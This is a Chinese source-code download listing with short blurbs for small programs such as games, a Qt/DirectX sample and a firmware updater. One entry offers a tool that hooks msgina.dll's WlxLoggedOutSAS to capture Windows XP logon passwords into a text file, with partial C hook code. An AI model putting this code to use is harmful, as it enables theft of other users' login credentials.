-
一个在EVC下写的动画显示程序,不同于GIF动画,不需要开线程...
一个在EVC下写的动画显示程序,不同于GIF动画,不需要开线程-under a written procedure animated show, unlike GIF animation, no open thread
- 2022-03-21 03:35:25下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
with vc development of the Russian squares procedure is a small game software
用vc开发的俄罗斯方块程序,是个小型游戏软件-with vc development of the Russian squares procedure is a small game software
- 2023-04-12 10:50:03下载
- 积分:1
-
扑克游戏特点:(1)增加的大小,王(2)删除指定…
扑克牌游戏
功能:
(1)增加大小王
(2)删除指定扑克后余牌显示-Poker game features: (1) to increase the size of Wang (2) delete the designated poker license after more than show
- 2022-02-03 06:23:16下载
- 积分:1
-
this is the code for forum
this the code for um-this is the code for forum
- 2023-06-07 02:45:03下载
- 积分:1
-
家庭视频监控系统
C#(Csharp)是微软公司发布的一种面向对象的,运行于.NET Framework之上的高级程序设计语言。C#是微软公司研究员Anders Hejlsberg的最新成果。C#看起来与Java有着惊人的相似;它包括了诸如单一继承,接口,与Java几乎同样的语法,和编译成中间代码再运行的过程。这个是家庭视频监控系统的教学源码
- 2022-02-14 07:49:54下载
- 积分:1
-
IAP升级工具
C# 开发的PC端升级工具 对MCU的固件进行升级,此工具为长期测试有效使用的可靠工具,请放心使用
- 2022-08-11 15:29:27下载
- 积分:1
-
Windows Mobile 中如何制作Setup D
Windows Mobile 中如何制作Setup D-Windows Mobile How to make Setup DLL
- 2022-03-03 11:11:14下载
- 积分:1
-
这是《Windows核心编程》所对应的程序源码,希望对有需要的朋友有所帮助...
这是《Windows核心编程》所对应的程序源码,希望对有需要的朋友有所帮助-This is the "core Windows programming" by the corresponding procedures source, and I hope to have a friend in need of some help
- 2022-12-25 11:30:03下载
- 积分:1
-
Qt 如何调用 DirectX 示例代码
Qt 如何调用 DirectX 示例代码
Qt 4.7.4 下测试编译成功运行,对初学者熟悉Qt调用DirectX的方法有很好的帮助!
- 2022-05-09 04:48:03下载
- 积分:1